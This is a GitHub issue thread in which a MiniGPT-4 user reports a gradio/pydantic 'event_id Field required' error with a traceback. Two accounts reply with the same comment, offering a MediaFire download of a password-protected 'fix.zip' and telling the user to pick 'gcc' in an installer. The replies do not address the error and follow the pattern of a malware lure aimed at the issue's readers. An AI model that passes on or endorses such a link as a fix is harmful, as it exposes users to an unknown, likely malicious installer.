### ISSUE TITLE
ERROR:asyncio:Task exception was never retrieved future: <Task finished name='nb0anyrlvls_0' coro=<Queue.process_events() done

### ISSUE THREAD

**Issue by Timeviewerzero** [Vision-CAIR/MiniGPT-4#527]
Now，I can successfully luanch the project，but when I upload one picture， there is a issue described as follows：
**ERROR:**asyncio:Task exception was never retrieved
future: <Task finished name='fqbmj2rprle_0' coro=<Queue.process_events() done, defined at D:\anaconda3\envs\minigptv\lib\site-packages\gradio\queueing.py:343> exception=1 validation error for PredictBody
event_id
  Field required [type=missing, input_value={'fn_index': 0, 'data': [...on_hash': 'fqbmj2rprle'}, input_type=dict]      
    For further information visit https://errors.pydantic.dev/2.8/v/missing>
Traceback (most recent call last):
  File "D:\anaconda3\envs\minigptv\lib\site-packages\gradio\queueing.py", line 347, in process_events
    client_awake = await self.gather_event_data(event)
  File "D:\anaconda3\envs\minigptv\lib\site-packages\gradio\queueing.py", line 220, in gather_event_data
    data, client_awake = await self.get_message(event, timeout=receive_timeout)
  File "D:\anaconda3\envs\minigptv\lib\site-packages\gradio\queueing.py", line 456, in get_message
    return PredictBody(**data), True
  File "D:\anaconda3\envs\minigptv\lib\site-packages\pydantic\main.py", line 193, in __init__
    self.__pydantic_validator__.validate_python(data, self_instance=self)
pydantic_core._pydantic_core.ValidationError: 1 validation error for PredictBody
event_id
  Field required [type=missing, input_value={'fn_index': 0, 'data': [...on_hash': 'fqbmj2rprle'}, input_type=dict]      
    For further information visit https://errors.pydantic.dev/2.8/v/missing
    
    ### I wanna konw how can I solve this problem？
![微信图片_20240826201928](https://github.com/user-attachments/assets/31104fd5-2d52-4aa9-b13a-c4fdf1ff7caa)

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Timeviewerzero** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

I don't understand what you are saying？Can you be more detailed？
